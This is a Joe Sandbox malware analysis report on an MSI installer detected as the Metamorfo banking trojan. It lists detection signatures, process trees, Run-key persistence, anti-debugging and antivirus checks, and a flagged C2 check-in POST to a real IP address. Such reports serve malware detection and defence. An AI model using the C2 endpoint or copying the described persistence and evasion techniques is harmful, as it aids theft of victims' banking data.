Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fiF8mxzUfw.msi

Overview

General Information

Sample name:fiF8mxzUfw.msi
renamed because original name is a hash value
Original sample name:e90cd70336c7763daad5ccef0a171e4e18d745b872331a1e58ec90909e8ebf05.msi
Analysis ID:1592145
MD5:878933ddb3c232ad3d24df9248d143ad
SHA1:ad166a8895b669a267f8dd05a86f373c29a2cc05
SHA256:e90cd70336c7763daad5ccef0a171e4e18d745b872331a1e58ec90909e8ebf05
Tags:bankerlatammsitrojanuser-johnk3r
Infos:

Detection

Metamorfo
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Metamorfo
AI detected suspicious sample
Creates autostart registry keys with suspicious names
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Switches to a custom stack to bypass stack traces
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • msiexec.exe (PID: 7452 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fiF8mxzUfw.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7484 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7600 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BF43BF43BD46E906A55A8F42824DA673 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • Wi-fii Corporativo.exe (PID: 7732 cmdline: "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe" MD5: 8AAF6B0EF4409498EAA1F506819285CF)
  • Wi-fii Corporativo.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe" MD5: 8AAF6B0EF4409498EAA1F506819285CF)
    • WerFault.exe (PID: 4508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7400 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • Wi-fii Corporativo.exe (PID: 5508 cmdline: "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe" MD5: 8AAF6B0EF4409498EAA1F506819285CF)
    • WerFault.exe (PID: 380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 3056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MetamorfoAccording to BitDefender, Metamorfo is a family of banker Trojans that has been active since mid-2018. It primarily targets Brazilians and is delivered mostly through Office files rigged with macros in spam attachments. Metamorfo is a potent piece of malware, whose primary capability is theft of banking information and other personal data from the user and exfiltration of it to the C2 server.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_MetamorfoYara detected MetamorfoJoe Security

    System Summary

    barindex
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe, ProcessId: 7732, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wi-fii Corporativo.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-15T20:35:42.812878+010028331871Malware Command and Control Activity Detected192.168.2.54971115.228.77.17880TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\cef_frame.dllReversingLabs: Detection: 34%
    Source: fiF8mxzUfw.msiVirustotal: Detection: 13%Perma Link
    Source: fiF8mxzUfw.msiReversingLabs: Detection: 21%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.8% probability
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\cef_frame.dllJoe Sandbox ML: detected
    Source: Binary string: E:\workplace\AndroidEmulator\7KMarket_Git_Release64\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: Wi-fii Corporativo.exe, 00000004.00000000.2061984355.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000000.2494433940.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2700277175.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000000.2582056760.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3684850513.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe.1.dr
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: fiF8mxzUfw.msi, MSI2AE0.tmp.1.dr, MSI28F8.tmp.1.dr, MSI2995.tmp.1.dr, MSI2A05.tmp.1.dr, 6f262c.msi.1.dr
    Source: Binary string: E:\workplace\AndroidEmulator\7KMarket_Git_Release64\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: Wi-fii Corporativo.exe, 00000004.00000000.2061984355.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000000.2494433940.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2700277175.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000000.2582056760.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3684850513.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Wi-fii Corporativo.exe.1.dr
    Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_microsoft.window_fce914e429116371317fd6ae8e3a6ad884573e_e281e47e_5794bd2b-1663-4d82-bb7e-b5838504a6be\Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Wi-fii Corporati_3ff5516a8ab04d5e2061f4da532180c5d2a1080_d6cb0167_5ef81f74-43b2-4a4c-9f72-dafcda16006e\Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\Jump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueueJump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2833187 - Severity 1 - ETPRO MALWARE Win32/Metamorfo CnC Checkin : 192.168.2.5:49711 -> 15.228.77.178:80
    Source: global trafficTCP traffic: 192.168.2.5:59922 -> 162.159.36.2:53
    Source: Joe Sandbox ViewIP Address: 15.228.77.178 15.228.77.178
    Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
    Source: global trafficHTTP traffic detected: POST /ytr/serv.php HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 142Host: 15.228.77.178Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 15.228.77.178
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
    Source: unknownHTTP traffic detected: POST /ytr/serv.php HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 142Host: 15.228.77.178Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://ocsp.digicert.com0N
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
    Source: Wi-fii Corporativo.exe, 00000007.00000002.2701399669.0000000001701000.00000020.00000001.01000000.00000004.sdmp, Wi-fii Corporativo.exe, 00000007.00000002.2712198268.000000000683F000.00000004.00001000.00020000.00000000.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3690828895.0000000005D7F000.00000004.00001000.00020000.00000000.sdmp, Wi-fii Corporativo.exe, 00000008.00000002.3685884269.0000000000D71000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.indyproject.org/
    Source: Wi-fii Corporativo.exe.1.drString found in binary or memory: https://www.digicert.com/CPS0

    System Summary

    barindex
    Source: cef_frame.dll.1.drStatic PE information: section name: .E{7
    Source: cef_frame.dll.1.drStatic PE information: section name: .< a
    Source: cef_frame.dll.1.drStatic PE information: section name: .z}'
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6f2629.msiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI28F8.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2995.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI29D5.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2A05.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2AE0.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{AD07A654-F9E0-4C2E-8281-C407422B8AAE}Jump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B8D.tmpJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6f262c.msiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6f262c.msiJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI28F8.tmpJump to behavior
    Source: Joe Sandbox ViewDropped File: C:\Windows\Installer\MSI28F8.tmp D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012
    Source: cef_frame.dll.1.drStatic PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: cef_frame.dll.1.drStatic PE information: Number of sections : 13 > 10
    Source: fiF8mxzUfw.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs fiF8mxzUfw.msi
    Source: classification engineClassification label: mal96.troj.evad.winMSI@12/46@0/1
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML2FAF.tmpJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8156
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5508
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF55287FD11A5006EE.TMPJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: fiF8mxzUfw.msiVirustotal: Detection: 13%
    Source: fiF8mxzUfw.msiReversingLabs: Detection: 21%
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fiF8mxzUfw.msi"
    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF43BF43BD46E906A55A8F42824DA673
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8156 -s 1012
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616
    Source: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 616
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF43BF43BD46E906A55A8F42824DA673Jump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe "C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe"Jump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
